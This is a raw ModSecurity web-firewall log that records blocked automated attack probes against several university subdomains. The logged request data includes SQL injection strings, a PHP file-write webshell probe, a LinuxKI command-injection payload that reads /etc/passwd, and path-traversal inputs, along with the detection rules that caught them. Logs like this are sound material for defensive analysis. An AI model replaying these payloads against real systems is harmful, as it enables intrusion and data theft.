[Tue Aug 29 11:34:56.317123 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAAQKOwIAAAAs"]
[Tue Aug 29 11:34:56.340755 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAUdm4MAAABS"]
[Tue Aug 29 11:34:56.341300 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAUIz74AAABA"]
[Tue Aug 29 11:34:56.342457 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAATPtSYAAAAM"]
[Tue Aug 29 11:34:56.342677 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAUXLjcAAABM"]
[Tue Aug 29 11:34:56.343698 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAATge6EAAAAl"]
[Tue Aug 29 11:34:56.343941 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11cMCo-f0AAATlLFUAAAAq"]
[Tue Aug 29 11:34:56.344557 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAASOUpcAAAAR"]
[Tue Aug 29 11:34:56.345463 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAATavvAAAAAg"]
[Tue Aug 29 11:34:56.346168 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAATmZeEAAAAr"]
[Tue Aug 29 11:34:56.349487 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAATzVI0AAAAx"]
[Tue Aug 29 11:34:56.353941 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAUZcF4AAABO"]
[Tue Aug 29 11:34:56.369775 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAT9PPIAAAA1"]
[Tue Aug 29 11:34:57.305503 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ccCo-f0AAATOA@QAAAAH"]
[Tue Aug 29 11:34:57.307675 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11ccCo-f0AAATlLFYAAAAq"]
[Tue Aug 29 11:34:57.315515 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAAPDoQIAAAAP"]
[Tue Aug 29 11:34:57.316586 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAATge6IAAAAl"]
[Tue Aug 29 11:34:57.316934 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAATmZeIAAAAr"]
[Tue Aug 29 11:34:57.323032 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAUNak8AAABF"]
[Tue Aug 29 11:34:57.329534 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAASEJYAAAAAE"]
[Tue Aug 29 11:34:57.331890 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAAShCZ4AAAAi"]
[Tue Aug 29 11:34:57.339516 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAAULx8gAAABD"]
[Tue Aug 29 11:34:57.339780 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAPLwKAAAAAX"]
[Tue Aug 29 11:34:57.348753 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAAT@KwIAAAA2"]
[Tue Aug 29 11:34:57.349638 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAAUIz78AAABA"]
[Tue Aug 29 11:34:57.351960 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAAUUZ8gAAABK"]
[Tue Aug 29 11:34:57.353083 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAATge6MAAAAl"]
[Tue Aug 29 11:34:57.371183 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAATYeE0AAAAd"]
[Tue Aug 29 11:34:57.376676 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAAUB02QAAAA5"]
[Tue Aug 29 11:34:58.303651 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAAVJXkMAAAAA"]
[Tue Aug 29 11:34:58.308678 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAASHh9IAAAAD"]
[Tue Aug 29 11:34:58.309751 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAATQXh4AAAAO"]
[Tue Aug 29 11:34:58.323516 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAATzVI8AAAAx"]
[Tue Aug 29 11:34:58.329757 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAAUKhAgAAABC"]
[Tue Aug 29 11:34:58.336282 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11csCo-f0AAAUJIy4AAABB"]
[Tue Aug 29 11:34:58.357932 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11csCo-f0AAAUUZ8oAAABK"]
[Tue Aug 29 11:34:58.362558 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11csCo-f0AAATavvIAAAAg"]
[Tue Aug 29 11:34:58.369544 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11csCo-f0AAAPLwKIAAAAX"]
[Tue Aug 29 11:34:58.381322 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11csCo-f0AAAShCaAAAAAi"]
[Tue Aug 29 11:34:59.307727 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAAUJIy8AAABB"]
